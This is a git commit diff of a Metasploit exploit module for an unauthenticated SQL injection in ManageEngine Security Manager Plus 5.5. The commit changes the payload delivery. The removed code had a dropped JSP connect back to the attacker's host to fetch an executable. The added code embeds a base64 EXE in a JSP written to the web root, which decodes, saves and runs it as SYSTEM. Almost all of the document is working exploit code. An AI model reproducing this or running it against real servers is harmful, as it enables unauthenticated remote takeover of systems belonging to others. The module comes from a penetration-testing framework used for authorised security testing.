Write EXE to JSP instead of using a TCPServer

2012-10-23 11:32:09 -05:00 · 2012-10-23 11:32:09 -05:00 · 923ffe277d
parent e5ec51a780
commit 923ffe277d
1 changed files with 18 additions and 57 deletions
--- a/modules/exploits/windows/http/manageengine_search_sqli.rb
+++ b/modules/exploits/windows/http/manageengine_search_sqli.rb
@ -11,7 +11,6 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking

 	include Msf::Exploit::Remote::HttpClient
-	include Msf::Exploit::Remote::TcpServer
 	include Msf::Exploit::EXE

 	def initialize(info={})
@ -19,10 +18,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Name'           => "ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection",
 			'Description'    => %q{
 					This module exploits a SQL injection found in ManageEngine Security Manager Plus
-				advanced search page.  It will send a malicious SQL query to create a JSP file
-				under the web root directory, and then let it download and execute our malicious
-				executable under the context of SYSTEM.  Authentication is not required in order
-				to exploit this vulnerability.
+				advanced search page, which results in remote code execution under the context of
+				SYSTEM.  Authentication is not required in order to exploit this vulnerability.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>
@ -87,16 +84,6 @@ class Metasploit3 < Msf::Exploit::Remote
 	end


-	#
-	# Transfer the malicious executable to our victim
-	#
-	def on_client_connect(cli)
-		print_status("#{cli.peerhost}:#{cli.peerport} - Sending executable (#{@native_payload.length} bytes)")
-		cli.put(@native_payload)
-		service.close_client(cli)
-	end
-
-
 	#
 	# Generate a download+exe JSP payload
 	#
@ -104,43 +91,30 @@ class Metasploit3 < Msf::Exploit::Remote
 		my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST']
 		my_port = datastore['SRVPORT']

-		var_buf       = Rex::Text.rand_text_alpha(rand(8) + 3)
-		var_shellcode = Rex::Text.rand_text_alpha(rand(8) + 3)
-		var_outstream = Rex::Text.rand_text_alpha(rand(8) + 3)
-		var_socket    = Rex::Text.rand_text_alpha(rand(8) + 3)
-		var_bufreader = Rex::Text.rand_text_alpha(rand(8) + 3)
-		var_decoder   = Rex::Text.rand_text_alpha(rand(8) + 3)
-		var_temp      = Rex::Text.rand_text_alpha(rand(8) + 3)
-		var_path      = Rex::Text.rand_text_alpha(rand(8) + 3)
-		var_proc      = Rex::Text.rand_text_alpha(rand(8) + 3)
+		native_payload      = Rex::Text.encode_base64(generate_payload_exe)
+		native_payload_name = rand_text_alpha(rand(6)+3)

 		jsp = %Q|
 		<%@page import="java.io.*"%>
-		<%@page import="java.net.*"%>
 		<%@page import="sun.misc.BASE64Decoder"%>

 		<%
-		StringBuffer #{var_buf} = new StringBuffer();
-		byte[] #{var_shellcode} = null;
-		BufferedOutputStream #{var_outstream} = null;
+		byte[] shellcode = null;
+		BufferedOutputStream outstream = null;
 		try {
-			Socket #{var_socket} = new Socket("#{my_host}", #{my_port});
-			BufferedReader #{var_bufreader} = new BufferedReader(new InputStreamReader(#{var_socket}.getInputStream()));
-			while (#{var_buf}.length() < #{@native_payload.length}) {
-				#{var_buf}.append( (char) #{var_bufreader}.read());
-			}
+			String buf = "#{native_payload}";

-			BASE64Decoder #{var_decoder} = new BASE64Decoder();
-			#{var_shellcode} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
+			BASE64Decoder decoder = new BASE64Decoder();
+			shellcode = decoder.decodeBuffer(buf.toString());

-			File #{var_temp} = File.createTempFile("#{@native_payload_name}", ".exe");
-			String #{var_path} = #{var_temp}.getAbsolutePath();
+			File temp = File.createTempFile("#{native_payload_name}", ".exe");
+			String path = temp.getAbsolutePath();

-			#{var_outstream} = new BufferedOutputStream(new FileOutputStream(#{var_path}));
-			#{var_outstream}.write(#{var_shellcode});
-			#{var_outstream}.close();
+			outstream = new BufferedOutputStream(new FileOutputStream(path));
+			outstream.write(shellcode);
+			outstream.close();

-			Process #{var_proc} = Runtime.getRuntime().exec(#{var_path});
+			Process p = Runtime.getRuntime().exec(path);
 		} catch (Exception e) {}
 		%>
 		|
@ -156,9 +130,6 @@ class Metasploit3 < Msf::Exploit::Remote
 	# Run the actual exploit
 	#
 	def inject_exec
-		# This little lag is meant to ensure the TCP server runs first before the requests
-		select(nil, nil, nil, 1)
-
 		# Inject our JSP payload
 		hex_jsp = generate_jsp_payload

@ -211,19 +182,9 @@ class Metasploit3 < Msf::Exploit::Remote
 	# The server must start first, and then we send the malicious requests
 	#
 	def exploit
-		# Avoid passing this as an argument for performance reasons
-		# This is in base64 is make sure our file isn't mangled
-		@native_payload		 = [generate_payload_exe].pack("m*")
-		@native_payload_name = rand_text_alpha(rand(6)+3)
-		@jsp_name            = rand_text_alpha(rand(6)+3)
-		@outpath             = "\"../../webapps/SecurityManager/#{@jsp_name + '.jsp'}\""
+		@jsp_name = rand_text_alpha(rand(6)+3)
+		@outpath  = "\"../../webapps/SecurityManager/#{@jsp_name + '.jsp'}\""

-		begin
-			t = framework.threads.spawn("reqs", false) { inject_exec }
-			print_status("Serving executable on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}")
-			super
-		ensure
-			t.kill
-		end
+		inject_exec
 	end
 end